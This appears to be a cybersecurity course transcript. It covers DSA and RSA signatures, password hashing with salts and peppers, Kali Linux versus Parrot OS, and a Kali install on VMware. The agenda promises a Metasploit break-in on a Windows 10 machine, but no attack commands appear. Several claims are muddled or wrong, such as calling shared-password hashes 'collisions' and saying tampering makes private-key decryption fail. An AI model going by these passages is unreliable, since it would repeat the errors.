In many instances, digital signatures provide a layer of validation and security for messages sent through a non-secure channel: properly implemented, a digital signature gives the receiver reason to believe that the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects, but properly implemented digital signatures are more difficult to forge than the handwritten type. Digital signature schemes, in the sense used here, are cryptographically based and must be implemented properly to be effective. They can also provide non-repudiation, meaning that the signer cannot successfully claim that they did not sign a message while also claiming their private key remains secret; further, some non-repudiation schemes offer a timestamp for the digital signature, so that even if the private key is later exposed, the signature remains valid.

To implement the concept of digital signatures in the real world, we have two primary algorithms to follow: the RSA algorithm and the DSA algorithm. The latter is our topic of learning today, so let's go ahead and see what the Digital Signature Algorithm is supposed to do. The Digital Signature Algorithm is a FIPS standard, that is, a Federal Information Processing Standard, for digital signatures. It was proposed in 1991 and globally standardized in 1994 by the National Institute of Standards and Technology, also known as NIST. It functions on the framework of modular exponentiation and discrete logarithm problems, which are difficult to compute by brute force.

Unlike DSA, most signature types are generated by signing the message digest with the private key of the originator, creating a digital thumbprint of the data. Since just the message digest is signed, the signature is generally much smaller than the data that was signed; as a result, digital signatures impose less load on processors at signing time and use small volumes of bandwidth. DSA, on the other hand, does not encrypt the message digest with the private key or decrypt it with the public key; instead, it uses mathematical functions to create a digital signature consisting of two 160-bit numbers, derived from the message digest and the private key. DSA makes use of the public key for authenticating the signature, but the authentication process is much more complicated when compared with RSA. DSA also provides three benefits: message authentication, integrity verification, and non-repudiation.

In the image, we can see the entire process of DSA validation. A plain text message is passed to a hash function, where the digest is generated and passed on to a signing function. The signing function also has other parameters, like a global variable G, a random variable K, and the private key of the sender.
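The generic hash-then-sign flow described above can be reproduced with OpenSSL (a sketch reusing the hypothetical `demo.key.pem` / `demo.pub.pem` pair generated earlier; `report.txt` is any file you like):

```bash
# Sender: hash the document and sign the digest with the private key
openssl dgst -sha256 -sign demo.key.pem -out report.sig report.txt

# Receiver: recompute the digest and verify it against the signature
openssl dgst -sha256 -verify demo.pub.pem -signature report.sig report.txt
# prints "Verified OK" if the document is intact and the signer holds the private key
```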
The outputs are then bundled into a single pack with the plain text and sent to the receiver. The two outputs we receive from the signing function are the two 160-bit numbers, denoted by S and R. On the receiver's end, we pass the plain text through the same hash function to regenerate the message digest, which is passed to a verification function; that function has other requirements as well, such as the public key of the sender, the global variable G, and the S and R values received from the sender. The value generated by the verification function is then compared to R: if they match, the verification process is complete and data integrity is verified. This was an overview of how the DSA algorithm works. We already know it depends on logarithmic functions to calculate its outputs, so let us see how it does so across three phases (the standard equations are collected right after this walkthrough).

The first phase is key generation, which has some prerequisites. We select a q, which becomes the prime divisor, and we select a prime number p such that (p - 1) mod q = 0. We also select an integer g; in the standard construction, g = h^((p-1)/q) mod p for some integer h with 1 < h < p - 1, chosen so that g comes out greater than 1. Once these values are selected, we can go ahead with generating the keys. The private key, denoted by x, is any random integer in the bracket between 0 and q. The public key can then be calculated as y = g^x mod p, where y stands for the public key. The private key is packaged as a bundle comprising the values p, q, g, and x; similarly, the public key is packaged as a bundle containing p, q, g, and y.

Once the keys are generated, we can start generating the signature. The message is first passed through a hash function to generate the digest, H. We choose any random integer k in the bracket between 0 and q. To calculate the first 160-bit output of the signing function, r, we use the formula r = (g^k mod p) mod q; to calculate the second output, s, we use the formula s = k^(-1) (H + x r) mod q. The signature is then packaged as a bundle holding r and s, and that bundle, along with the plain text message, is passed on to the receiver.

In the third phase, we verify the signature. We first calculate the digest of the message received in the bundle by passing it through the same hash function, then compute the values w = s^(-1) mod q, u1 = H w mod q, and u2 = r w mod q. We then calculate the verification component that is to be compared with the value of r sent by the sender: v = (g^u1 y^u2 mod p) mod q. Once calculated, v is compared with r; if the values match, the signature verification is successful and our entire process is complete, from key generation, to signature generation, all the way up to the verification of the signature.
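Collected in one place, these are the standard textbook DSA equations referenced above (H(m) denotes the message digest):

```latex
% Standard DSA equations (textbook form)
\begin{align*}
\text{Key generation:}\quad & (p-1) \bmod q = 0, \qquad g = h^{(p-1)/q} \bmod p \ \ (g > 1),\\
                            & 0 < x < q \ \text{(private)}, \qquad y = g^{x} \bmod p \ \text{(public)}\\[4pt]
\text{Signing:}\quad        & 0 < k < q \ \text{(random)}, \qquad
                              r = \bigl(g^{k} \bmod p\bigr) \bmod q, \qquad
                              s = k^{-1}\bigl(H(m) + x\,r\bigr) \bmod q\\[4pt]
\text{Verification:}\quad   & w = s^{-1} \bmod q, \qquad u_1 = H(m)\,w \bmod q, \qquad u_2 = r\,w \bmod q,\\
                            & v = \bigl(g^{u_1}\,y^{u_2} \bmod p\bigr) \bmod q,
                              \qquad \text{signature valid iff } v = r
\end{align*}
```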
With so many steps to follow, we are bound to have a few advantages to boot, and we would be right to think so. DSA is highly robust in its security and stability when compared to alternative signature verification algorithms; a few other ciphers aim to achieve the simplicity and flexibility of DSA, but that has been a tough ask for all the other contenders. Key generation is much faster in DSA when compared to the RSA algorithm, and while the actual encryption and decryption process may falter a little in comparison, a quicker start is well known to optimize a lot of frameworks. DSA also requires less storage space to work through its entire cycle; in contrast, its direct counterpart, the RSA algorithm, needs a certain amount of computational and storage space to function efficiently. This is not the case with DSA, which has been optimized to work with weaker hardware and fewer resources. The DSA is patented, but NIST has made the patent available worldwide royalty-free. A draft version of specification FIPS 186-5 indicates that DSA will no longer be approved for digital signature generation, though it may be used to verify signatures generated prior to the implementation date of that standard.

The RSA algorithm is a public key signature algorithm developed by Ron Rivest, Adi Shamir, and Leonard Adleman. The paper was first published in 1977, and the algorithm uses logarithmic functions to keep the workings complex enough to withstand brute force, yet streamlined enough to be fast after deployment. RSA can also encrypt and decrypt general information to securely exchange data, alongside handling digital signature verification. Let us understand how it achieves this.

We take our plain text message M and pass it through a hash function to generate a digest, H, which is then encrypted using the sender's private key. This is appended to the original plain text message and sent over to the receiver. Once the receiver gets the bundle, he can pass the plain text message through the same hash function to generate a digest, while the cipher text is decrypted using the public key of the sender. The two hashes are then compared: if the values match, data integrity is verified and the sender is authenticated.

Apart from digital signatures, the main use case of RSA is the encryption and decryption of private information before it is transmitted across communication channels. This is where data encryption comes into play. When using RSA for encryption and decryption of general data, the key usage is reversed compared to signature verification: it uses the receiver's public key to encrypt the data and the receiver's private key to decrypt it, so there is no need to exchange any keys in this scenario.

There are two broad components to RSA cryptography. One of them is key generation: the steps for generating the private and public keys that are going to be used for encrypting and decrypting the data. The second part is the encryption and decryption functions: the ciphers and steps that need to be run when scrambling the data or recovering it from the cipher text. You will now see each of these steps in our next subtopic.

Keeping the previous two concepts in mind, let us go ahead and see how the entire process works, starting from creating the key pair through encrypting and decrypting the information. We need to generate the public and private keys before running the functions that generate cipher text and plain text, and they use certain variables and parameters, all of which are explained here. We first choose two large prime numbers, denoted by p and q. We compute n = p x q and compute z = (p - 1) x (q - 1). A number e is chosen such that 1 < e < z and e shares no common factor with z, and a number d is selected to satisfy the formula e d mod z = 1, from which it can be calculated. The public key is then packaged as the bundle (n, e), and the private key is packaged as the bundle (n, d). This sums up the key generation process.
For the encryption and decryption functions we use formulas relating C and M: the cipher text is calculated as C = M^e mod n, and the plain text is recovered from the cipher text as M = C^d mod n.

For a worked data-encryption example, take p = 7 and q = 13. The value of n works out to 91, and z = (7 − 1) × (13 − 1) = 72. If we select e = 5, it satisfies all the criteria we need, and d can be calculated from e × d mod z = 1, which gives d = 29. The public key is then packaged as (91, 5) and the private key as (91, 29). If the plain text M is 10, the cipher text is C = M^e mod n = 10^5 mod 91 = 82. Whoever receives this cipher text can recover the plain text as M = C^d mod n = 82^29 mod 91 = 10, the value we selected as our plain text.
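The arithmetic above is easy to check yourself. Here is a toy Bash sketch using the same numbers; the `modexp` helper is a name made up for this example, and real RSA of course uses primes hundreds of digits long:

```bash
#!/usr/bin/env bash
# Toy RSA demo with the numbers from the text: p=7, q=13 -> n=91, z=72, e=5, d=29.

modexp() {                      # modexp BASE EXPONENT MODULUS (square-and-multiply)
  local base=$1 exp=$2 mod=$3 result=1
  base=$(( base % mod ))
  while (( exp > 0 )); do
    (( exp % 2 == 1 )) && result=$(( result * base % mod ))
    exp=$(( exp / 2 ))
    base=$(( base * base % mod ))
  done
  echo "$result"
}

n=91; e=5; d=29; m=10
c=$(modexp "$m" "$e" "$n")                  # 10^5 mod 91 = 82
echo "cipher text: $c"
echo "recovered:   $(modexp "$c" "$d" "$n")" # 82^29 mod 91 = 10
```

Running it prints the cipher text 82 and recovers 10, matching the worked example.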
We can now look at the factors that make the RSA algorithm stand out from its competitors: the advantages covered in this lesson. RSA encryption depends on using the receiver's public key, so you never have to share any secret key in order to receive messages from others; that was the most glaring flaw of symmetric algorithms, eventually fixed by the asymmetric cryptography structure. Since the key pairs are mathematically related, an eavesdropper cannot read an intercepted message, because they do not have the correct private key to decrypt the information. And if a public key can decrypt the information, the sender cannot refuse having signed it with his private key without admitting that the private key is, in fact, no longer private. The encryption process is also faster than that of the DSA algorithm, even if key generation is slower in RSA; many systems across the world tend to reuse the same keys so they can spend less time on key generation and more time on actual cipher text management. Data is tamper-evident in transit: meddling with the data breaks the relationship between the keys, so the private key will fail to decrypt the information, alerting the receiver to manipulation along the way. The receiver must, however, be aware of any third party who possesses the private key, since they could alter the data mid-transit, although the chances of that are rather low.

Imagine creating an account on a new website. You provide your email address and set a password you are confident you will not forget. But what about the website owner? How securely are they going to store your password? Website administrators have three alternatives: they can store the passwords in plain text format, they can encrypt the passwords using an encryption and decryption key, or they can store the passwords as hash values. Let's have a look at each of these.

When a password is stored in plain text format, it is considered the most unsafe option, since anyone in the company can read your password; a single hack or data server breach will expose all the accounts' credentials without any extra effort needed. To counter this, owners can encrypt the passwords and keep them on the servers, the second alternative, but that means they also have to store the decryption key somewhere on those servers. In the event of a data breach or server hack, both the decryption key and the encrypted passwords would be leaked, making it a single point of failure. But what if there were an option to store the passwords after scrambling them completely, with no way to decrypt them? This is where hashing comes into play. Since only the hashed values are stored on the server, no encryption is needed, and with no plain text passwords to protect, your credentials are safe even from the website administrators. Considering all these pros, hashed passwords are the industry standard for storing credentials nowadays.

Before getting too deep into the topic, let's get a brief overview of how hashing works. Hashing is the process of scrambling a piece of information or data beyond recognition. We achieve this using hash functions, which are essentially algorithms that perform mathematical operations on the plain text. The value generated after passing the plain text through the hash function is called the hash value, the digest, or in general just the hash of the original data. While this may sound similar to encryption, the major difference is that hashes are made to be irreversible: no decryption key can convert a digest back to its original value. A few hashing algorithms have been broken thanks to the increase in computational power of today's generation of computers and processors, but there are newer algorithms that stand the test of time and are still in use across many areas, for password storage, identity verification, and so on.

As we discussed earlier, websites use hashing to store users' passwords, so how do they make use of these hashed passwords? When a user signs up to create a new account, the password is run through the hash function and the resulting hash value is stored on the server. The next time the user logs in, the password they enter is passed through the same hash function and compared to the hash stored on the server. If the newly calculated hash is the same as the one stored on the website server, the password must have been correct, because with hash functions the same input always produces the same output. If the hashes do not match, the password entered during login is not the same as the one entered during signup, and the login is denied. This way, no plain text passwords are ever stored, preventing the owner from snooping on user data and protecting users' privacy in the unfortunate event of a data breach or hack.

Apart from password storage, hashing can also be used to perform integrity checks. When a file is uploaded to the internet, the file's hash value is generated and uploaded along with the original information. When a user downloads the file, they can calculate the digest of the downloaded file using the same hash function and compare the two values: if they match, file integrity has been maintained and there has been no data corruption.

Since so much important information is being passed to hash functions, we need to understand how they work. A hash function is a set of mathematical calculations operated on blocks of data: the main input is broken down into blocks of equal size, with the block size depending on the algorithm being used. Hash functions are designed to be one-way; they shouldn't be reversible, at least by design. Some algorithms, like the previously mentioned MD5, have been compromised, but most of the algorithms in use today, like the SHA family, remain secure. The digest size also depends on the respective algorithm: MD5 has a digest of 128 bits, while SHA-256 has a digest of 256 bits. The digest must always be the same for the same input, irrespective of how many times the calculation is carried out. This is a crucial feature, since comparing hash values is the only way to check that data is untouched, as the functions are not reversible.
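Both properties, determinism and sensitivity to change, can be seen from any Linux shell; `sha256sum` ships with coreutils, and the file name below is illustrative:

```bash
# Same input always yields the same digest; a one-character change alters it completely.
echo -n "hunter2" | sha256sum
echo -n "hunter2" | sha256sum   # identical digest
echo -n "hunter3" | sha256sum   # completely different digest

# Integrity check: recompute a download's digest and compare it to the published one.
sha256sum downloaded-file.iso
```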
There are certain requirements a hash function must meet before it is accepted. While some are easy to guess, others are in place to preserve security in the long run. The hash function must be quick enough to digest large amounts of data at a relatively fast pace, but it shouldn't be too fast: an algorithm running on all cylinders is easy to brute-force and becomes a security liability. There must be a balance that lets the hash function handle large amounts of data without making it ridiculously easy to run through all the possible combinations.

The hash function must also depend on every bit of the input. The input can be text, audio, video, or any other file format, and if even a single character changes, no matter how small, the resulting digest must be distinctly different. This is essential for creating unique digests for every password being stored. But what if two different users use the same password? Since the hash function is the same for all users, both digests will be identical; the stored hashes collide, which this lesson calls a hash collision. You may think it must be rare for two users to have exactly the same password, but that is not the case; we have techniques like salting that reduce these collisions, as we will discuss later in this video. You would be shocked to see the most used passwords of 2020: all of them are laughably insecure, and since many people reuse the same passwords on different websites, colliding hashes are more common than one would expect.

So suppose two users do have the same password; how can both hashes be stored without messing up the original data? This is where salting and peppering come into play. Salting is the process of adding a random keyword to the end of the input before it is passed to the hash function. This random keyword is unique for each user on the system and is called the salt value, or just the salt. Even if two passwords are exactly the same, the salt values will differ, and so will their digests. There is a small problem with this process, though: since the salt is unique for each user, it needs to be stored in the database along with the password, sometimes even in plain text, to speed up continuous verification. If the server is hacked, the hashes still need to be brute-forced, which takes a lot of time, but if the attackers obtain the salts as well, the entire process becomes very fast.

That is what peppering aims to solve. Peppering is also the process of adding a random string of data to the input before hashing, but this time the random string is not unique per user: it is common for all users in the database, and the extra bit added is called the pepper. The pepper isn't stored on the servers; it is mostly hardcoded into the website's source code, since it is the same for all credentials. This way, even if the servers get hacked, the attackers will not have the pepper needed to crack all the passwords. Many websites use a combination of salting and peppering to solve the hash collision problem and bolster security; since brute force takes such a long time, many hackers don't bother, as the returns are mostly not worth it and the space of possible combinations when using both salting and peppering is humongous.
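As a rough illustration of salting and peppering together, here is a hedged Bash sketch; the variable names are made up, and a production system would use a dedicated password-hashing scheme such as bcrypt or Argon2 rather than bare SHA-256:

```bash
#!/usr/bin/env bash
PEPPER="app-wide-secret"        # common to all users; lives in the code, not the database
password="hunter2"              # the user's chosen password (example value)

salt=$(openssl rand -hex 16)    # unique per user; stored alongside the hash
digest=$(printf '%s%s%s' "$salt" "$password" "$PEPPER" | sha256sum | awk '{print $1}')

# Same password + different salt = different digest; the pepper never touches the DB.
echo "stored record: $salt:$digest"
```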
With cybercrime getting more complex by the day, corporations need trained personnel in the field of cybersecurity. Ethical hacking and penetration testing have always been necessary for organizations and the general public to protect systems against malicious attackers; with the exponential growth in cyber attacks, however, the need to be trained in ethical hacking is at an all-time high. Many such professionals use Linux distributions for their penetration testing activities, and there are specific operating systems catered to ethical hackers, which come pre-installed with the necessary tools and scripts. Probably the most famous operating system in this bracket is Kali Linux. In today's video we learn about this distribution, made by and for hackers, and walk through the intricacies of its hardware and software requirements.

Let's take a look at the agenda. We start by learning what Kali Linux is, with a basic explanation of its purpose, then look at the history of Kali Linux, from the story of its origin to its current-day exploits. Next we learn a few distinct features of Kali Linux that make it an attractive choice for penetration testers worldwide, and then the multiple ways we can install Kali Linux to start our journey in the world of penetration testing. In the next few sections we compare it to an industry rival by the name of Parrot Security OS: we look at each operating system at a grassroots level, learn about the standout features and unique offerings of Kali Linux and Parrot Security, make a direct comparison of their hardware specifications and all-round usability, and conclude which operating system caters to which category of user. After that, we take a detailed look at how to install Kali Linux on a Windows 10 system using the VMware virtualization software, and go through some of the reasons to choose Kali Linux as a primary operating system for ethical hacking and penetration testing. In the next section we cover the five phases of penetration testing, each stage being a crucial segment in the entire cycle of an ethical hacking campaign, along with the most popular tools installed in Kali Linux that ethical hackers use regularly in their professional work. Coming to the live demonstrations, we start by learning some basic Linux terminal commands, set up proxychains to maintain privacy on the internet, run a few Nmap scans to find information about our victims, use Wireshark to detect insecure browser traffic traveling over HTTP web pages, learn about Metasploit and its components, and finally use Metasploit to hack into a Windows 10 machine and grant ourselves root access, the admin access that basically hands us the keys to the entire machine.

It's no secret that the majority of our internet usage is at risk of being hacked, be it via unsafe messaging applications or misconfigured operating systems. To counteract this void in digital security, penetration testing has become the norm for vulnerability assessment, and Kali Linux is an operating system that has become a well-known weapon in this fight against hackers. A Linux distribution made specifically for penetration testers, Kali Linux has layers of features, and this first lesson covers the basics: what Kali Linux is, its history, its distinct features, and the ways to install it.

Let's start by learning about Kali Linux in general. Kali Linux, formerly known as BackTrack Linux, is an open-source Linux distribution aimed at advanced penetration testing and security auditing. It contains several hundred tools targeted at various information security tasks, such as penetration testing, security research, computer forensics, and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system: Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali desktop. While the operating system lets you practically modify every single part of the installation, the networking components of Kali are disabled by default. This is done to prevent any external factors from affecting the installation procedure, which could pose a risk in critical environments; apart from boosting security, it allows a deeper element of control to the most enthusiastic of users.

We did not get Kali Linux on day one, so how did it come into existence? Let's take a look at some of its history. Kali Linux is based on years of knowledge and experience in building penetration testing operating systems, and across all these project lifelines there have been only a few different developers, as the team has always been small. The first project was called Whoppix, which stands for WhiteHat Knoppix; as can be inferred from the name, it was based on the Knoppix operating system. Whoppix had releases ranging from version 2.0 to 2.7.
This made way for the next project, known as WHAX, the longhand being WhiteHat Slax. The name changed because the base OS changed from Knoppix to Slax, and WHAX started at version 3 as a nod to it carrying on from Whoppix. A similar OS was being produced at the same time: Auditor Security Collection, often shortened to just Auditor, once again using Knoppix. Its efforts were combined with WHAX to produce BackTrack. BackTrack was based on Slackware from version 1 to version 3, but switched to Ubuntu for versions 4 and 5. Using the experience gained from all of this, Kali Linux came after BackTrack in 2013. Kali started off using Debian stable as the engine under the hood before moving to Debian testing, when Kali Linux became a rolling operating system.

Now that we understand the history and purpose of Kali Linux, let us learn a little more about its distinct features. The latest version of Kali comes with more than 600 penetration tools pre-installed. After reviewing every tool that was included in BackTrack, the developers eliminated a great number of tools that either simply did not work or duplicated other tools providing the same or similar functionality. The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols; restricting access to critical code bases from external assets greatly reduces the risk of source contamination, which could cause Kali Linux users worldwide a great deal of damage as direct victims of cybercrime. Although penetration tools tend to be written in English, the developers have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job; the more comfortable a user feels with the intricacies of the operating system, the easier it is to maintain a stronghold over the configuration and the device in general. And since ARM-based single-board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage, with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so the tools for ARM are updated in conjunction with the rest of the distribution.

All this information helps users determine whether Kali Linux is the correct choice for them; if it is, what are the ways to go forward with the installation and start a penetration testing journey? The first way to use Kali Linux is to launch the distribution in live USB mode. This is achieved by downloading the installer image (ISO) file from the Kali Linux website and flashing it to a USB drive with a capacity of at least 8 GB. Some people don't need to save data permanently, and a live USB is the perfect solution for such cases: after the ISO image is flashed, the thumb drive can be used to boot a fully working installation of the operating system, with the caveat that any changes made to the OS in this mode are not written permanently. Some setups allow persistent usage on live USBs, but those require further configuration.
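On Linux, flashing the ISO to a thumb drive is typically a one-liner with `dd`; the device name below is a placeholder, so verify it with `lsblk` first, since `dd` overwrites whatever it is pointed at:

```bash
# CAUTION: replace /dev/sdX with your USB drive's actual device node (check `lsblk`),
# and the ISO name with the file you actually downloaded.
sudo dd if=kali-linux-live-amd64.iso of=/dev/sdX bs=4M status=progress conv=fsync
```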
But what if the user wants to store data permanently in the installed OS? The best and most reliable way to ensure this is a full-fledged hard disk installation. This ensures complete usage of the system's hardware capabilities and preserves the updates and configurations made to the OS. This method overwrites any pre-existing operating system installed on the computer, be it Windows or any other variant of Linux.

The next route for installing Kali Linux is to use virtualization software such as VMware or VirtualBox. The software is installed as a separate application on an already existing OS, and Kali Linux runs as an operating system in a window on the same computer. The hardware allocation is completely customizable, from the allotted RAM to the virtual hard disk capacity, and the combination of a host and a guest operating system like Kali Linux gives users a safe environment to learn in while not putting their own systems at risk. If you want to learn more about this method, a dedicated walkthrough later in this lesson installs Kali Linux on VMware running on a Windows 10 operating system.

The final way to install Kali Linux is a dual boot system. To put it in simple words, the Kali Linux OS does not overwrite any pre-installed operating system on the machine but is installed alongside it; when the computer boots up, the user gets a choice of which operating system to boot into. Many people prefer to keep both Windows and Kali Linux installed so that work and recreational activities are divided effectively, and it gives users a safety valve should their custom Linux installation run into bugs that cannot be fixed from within the operating system.

Professionals in security testing, penetration testing, and ethical hacking utilize Linux as their preferred operating system, since it provides several configurable distributions that you can tailor to your end use. Kali Linux and Parrot OS are two popular penetration testing distributions. While each has unique offerings, the overall choice can differ between personnel thanks to their various tools and hardware requirements, so today we will look at both distributions and settle on the right choice for each type of user. The agenda for this video: we learn about Kali Linux and Parrot Security OS from scratch, understanding their primary selling points as Linux distributions catered to penetration testers; we get to know the features of these operating systems that stand out from the package; and finally we directly compare Kali Linux and Parrot Security OS, reaching a clear-cut conclusion on which OS is the better fit on a per-requirement basis.

Starting with Kali Linux at ground level: as covered earlier, Kali Linux, formerly known as BackTrack Linux, is the open-source, Debian-based distribution aimed at advanced penetration testing and security auditing. It bundles several hundred tools for penetration testing, security research, computer forensics, and reverse engineering, is freely available to professionals and hobbyists across platforms, rests on Debian's dependable and stable foundation, and ships with its networking components disabled by default during installation, which guards the install procedure against external interference and gives enthusiasts a more profound element of control.
Now let's take a look at the Parrot Security operating system. Parrot Security OS is a Debian-based Linux distribution with an emphasis on security, privacy, and development. It is built on Debian's testing branch and uses a custom hardened Linux kernel. Parrot Security contains several hundred tools targeted at tasks such as penetration testing, computer forensics, reverse engineering, and security research. It is seen as a generally lightweight distribution that can work under tight hardware and software constraints, and it features a distinct forensics mode that does not mount any of the system's hard disks or partitions and has no influence on the host system, making it much stealthier than a regular boot; this mode is used on a host system to execute forensic procedures.

A rolling release is a paradigm in software development in which upgrades are rolled out continuously rather than in batches of versions, ensuring the software is always up to date. A rolling release distribution such as Parrot Security OS follows the same concept: it provides the most recent Linux kernel and software versions as soon as they become available.

With a basic introduction to both operating systems out of the way, let us take a look at their unique features. For Kali Linux, these are the ones covered earlier: more than 600 pre-installed penetration tools, curated by removing anything from BackTrack that was broken or duplicated; a small trusted team as the only committers to the repositories, working over multiple secure protocols, which dramatically reduces the risk of source contamination; proper multilingual support so users can operate in their native language and locate the tools they need; and robust ARM support, with repositories integrated into the mainline distribution so ARM tools are updated alongside everything else.

Let's take a look at some features of the Parrot Security operating system now. Along with a giant catalog of scripts, Parrot Security OS has its own hardened Linux kernel, modified explicitly to provide as much security and resistance to hackers as possible as the first line of defense; the configurations in the operating system act as a second gateway, catching malicious requests and dropping them.
This is particularly beneficial: should the latest Linux kernel cause some particular issue, the Parrot OS development team will most likely iron it out before passing it on as an update. And as if the custom hardened kernel weren't enough, Parrot Security's developers have managed to include even more hacking tools and scripts, to ensure a smooth transition for Kali Linux users: all the tools you find in Kali are present in Parrot OS, plus a few extra for good measure, and this has been achieved while keeping roughly the same operating system size between the two.

It's not all productivity points for Parrot OS, though. It offers a choice between two desktop environments: MATE, which comes pre-installed by default, and KDE. For those unfamiliar with Linux terminology, you can think of a desktop environment as the main UI of a distribution. Being highly modular, Parrot Security OS can also run any other desktop environment a user finds appealing; but where Kali Linux ships a single default option, Parrot Security provides two optimized builds, one with the MATE desktop and one with KDE.

One of the primary advantages of Parrot OS over Kali Linux is that it is relatively lightweight: it takes significantly less disk space and computing power to function correctly, with as little as 320 MB of RAM required. In reality, Parrot OS is designed to operate successfully off a USB stick, whereas Kali Linux does not work well from a USB drive and is generally installed in a virtual machine. Parrot OS is more of a niche distribution if you're searching for something lighter than Kali Linux.

Features are great, but what about performance and real-world metrics? Let us compare the two operating systems directly, with respect to their hardware requirements and usability, so we can decide which distribution fits each type of user:

- RAM: Kali Linux demands at least 1 GB of RAM, while Parrot Security operates optimally on as little as 320 MB. This matters greatly when trying to crack hashes or run similar memory-hungry jobs.
- Graphics: Kali Linux requires GPU-based acceleration to display its graphical elements correctly; Parrot Security OS needs no graphical acceleration on the user's side.
- Disk: installed on VMware from the live-boot ISOs, both systems take a minimal amount of storage, with a recommended minimum of 20 GB for Kali Linux and 15 GB for Parrot Security, so all the tools in the ISO can be installed.
- Tools: Kali Linux has always been first in securing every single tool available to the penetration testing industry. Parrot Security has managed to take it up a notch: while specializing in wireless pentesting, it makes a point of including every tool Kali Linux provides in its ISO, while adding extras that Kali users would have to install from third-party sources.
- Community: as a decade-old penetration testing distribution, Kali Linux has formed a very big community with strong support. Parrot Security is still growing, but it is garnering ever more interest among veteran penetration testers and ethical hackers.
A primary drawback of Kali Linux is the extensive hardware required to perform optimally: it needs more memory than Parrot Security, graphical acceleration, and more virtual hard disk storage. Parrot Security, on the other hand, was initially designed to run directly off a USB drive, with very minimal hardware requirements, just 320 MB of RAM and no graphical acceleration, which makes it far more feasible for people who cannot devote massive resources to a virtual machine or to their laptop's hard disk.

With the comparison done, let's take a look at the type of user each system caters to. One can go with Kali Linux if they:

- want the extensive community support offered by its user base;
- want a trusted development team that has been working on the distribution for many years;
- have a powerful system that can run Kali Linux optimally without bottlenecking performance;
- are comfortable with a semi-professional environment that may not be very welcoming to new beginners.

One can go with Parrot Security if they:

- want a very lightweight, lean distribution that runs on pretty much any system;
- want its large set of pre-installed tools, some of which are not even present on Kali Linux;
- are on an underpowered rig or laptop without much hardware or any graphical acceleration to spare;
- are just getting into ethical hacking: Parrot's desktop environment is relatively easier for beginners, and Parrot Security does a relatively better job of introducing newcomers to the operating system and its various tools without dumping them straight into the intricacies.

Now, the installation of Kali Linux. There are multiple ways to install it: on a normal hard drive, in virtual machine software such as VMware or VirtualBox, or on bare-metal machines. For the convenience of explanation, we are going to install Kali Linux today on VMware, virtual machine software able to run multiple operating systems on a single host machine, which in our case is a Windows 10 system. To get started with the Kali Linux installation, we go to the Kali website to download an image file. Under Get Kali there are multiple platforms on which this operating system can be installed; as per our requirement, we go with the virtual machines section, which, as you can see, is already recommended by the developers. The download button fetches a 64-bit ISO file; a 32-bit image exists, but that is mostly for bare-metal installs or older devices that do not support 64-bit operating systems. After clicking the download button we get a compressed archive (shown here in WinRAR) containing the ISO file. With the ISO file downloaded and at hand, we can start working on the VMware side of things: once the ISO file is downloaded, we open VMware Workstation, go to File, and create a new virtual machine. Of the two options offered, it is highly recommended to go with the typical setup rather than the custom one.
The custom setup is much more advanced and requires much more information from the user, which is beneficial for developers and people well versed in virtualization software, but for 90% of cases the typical setup is enough. Here we select the third option, "I will install the operating system later." For some operating systems we could point VMware at the ISO file directly and it would install everything for us, but in the case of Kali Linux the third option is always the safest.

Kali Linux is a Linux distribution, so we select Linux as the guest operating system. As for the version, every distribution has a parent distribution it is based on or forked from: Kali Linux is based off Debian, so we go with the highest Debian version listed, Debian 10.x 64-bit, and click Next. We can use any name; writing "Kali Linux" makes the virtual machine easy to recognize in the list of virtual machine instances. The location can be anywhere you decide; by default it is the Documents folder, and whatever path you choose will hold all the information regarding the operating system, every file you download and every configuration you store.

Next we are asked about the disk capacity. This is all the storage that will be provided to your Kali Linux virtual machine. Think of your Windows device: if you have a 1 TB hard drive, you have that much of the disk to store data on; whatever amount you give here, you can store data only up to that amount, and some capacity is taken up by the operating system itself for its programs and applications. We could give around 15 GB, but since the recommended size for Debian is 20 GB, we can simply go ahead with 20. It all depends on the use case: if you plan to use it extensively, download many more applications, and perform many different tests, you can go as high as 50 or 60 GB.

Another option here is storing the virtual disk as a single file versus splitting it into multiple files. As we already know, these virtual machines run entirely on VMware, and sometimes, when transferring an instance, say from a personal computer to a work computer, we need to copy the entire folder mentioned before. All virtual machines have this portability, but porting is easier, whether system to system or software to software (say, switching from VMware to VirtualBox or vice versa), if the virtual disk is split into multiple files. The trade-off is that performance takes a small hit; it isn't huge, but if you have no plans to ever move the virtual machine, storing the virtual disk as a single file gives the best performance. Even then, a single-file machine can still be ported; it's just easier with multiple files. For the best performance, we store it as a single file here. Finally, we see a summary of all the changes and configurations settled so far.
At this point we have not yet provided the ISO file, the installation file for Kali Linux that we downloaded from the website; so far we have only configured the settings of the virtual machine. We press Finish, and Kali Linux appears in the list. To make further changes, we press "Edit virtual machine settings."

The memory setting assigns the RAM of the virtual machine. On host devices with 8 GB of RAM or less, assigning a large amount will cause performance issues for the host system. At idle, my Windows machine takes about 2 GB, leaving about 6 GB of memory to provide, but giving all 6 GB would make it much harder for the host system to run everything properly, so for this instance we keep it at 2 GB of memory for the virtual machine. Similarly, we can customize the number of processors to our liking; say we want one processor but two cores, we can select that as well. The hard disk is preset as a SCSI disk and does not need to be changed for the installation of this operating system at all.

CD/DVD is where the installation file comes in: you can think of the downloaded ISO file as the pen drive or USB thumb drive you would normally need to install an operating system. To provide it, we select "Use ISO image file," click Browse, go to Downloads, select the ISO file, and press Open; you can see it is loaded up. Next, for the network adapter it is recommended to use NAT, which helps the virtual machine draw internet access from the host machine: if your host machine is connected to the internet, the virtual machine is connected as well. There are other options, such as host-only or custom and LAN segments, but those are not necessary for installation. The rest of the settings are pretty standard, need no extra configuration, and can be left as they are; press OK, and now we can power on this virtual machine.

